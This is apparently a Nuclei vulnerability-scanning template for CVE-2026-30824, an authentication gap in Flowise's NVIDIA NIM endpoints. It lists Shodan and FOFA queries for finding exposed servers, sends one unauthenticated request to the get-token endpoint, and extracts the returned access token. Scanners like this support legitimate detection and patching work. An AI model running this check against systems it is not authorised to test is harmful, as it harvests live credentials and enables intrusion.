id: CVE-2026-30824 info: name: Flowise - NVIDIA NIM Endpoints Missing Authentication author: DhiyaneshDk severity: high description: | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. impact: | Unauthenticated attackers can access privileged container management and token generation, potentially leading to full system compromise. remediation: This issue has been patched in version 3.0.13 reference: - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454 - https://nvd.nist.gov/vuln/detail/CVE-2026-30824 - https://github.com/FlowiseAI/Flowise classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2026-30824 epss-score: 0.3625 epss-percentile: 0.98317 cwe-id: CWE-306 metadata: max-request: 2 vendor: flowiseai product: flowise shodan-query: title:"Flowise" fofa-query: title="Flowise" tags: cve,cve2026,flowise,nvidia,nim,unauth,auth-bypass,token-leak http: - method: GET path: - "{{BaseURL}}/api/v1/nvidia-nim/get-token" matchers: - type: dsl dsl: - "status_code == 200" - "contains_all(body, 'access_token','token_type')" condition: and extractors: - type: regex name: access_token group: 1 regex: - '"access_token"\s*:\s*"([^"]+)"' part: body # digest: 490a00463044022050ff9fe1d3cb93cb6d42041915ad3f4211d0b00ac98d0d9a0db3f325915a1ad6022027f893e2306034efdf088476a9f1bdb5f109fe063f46c11cbb35b97d9f543e8c:922c64590222798bb761d5b6d8e72950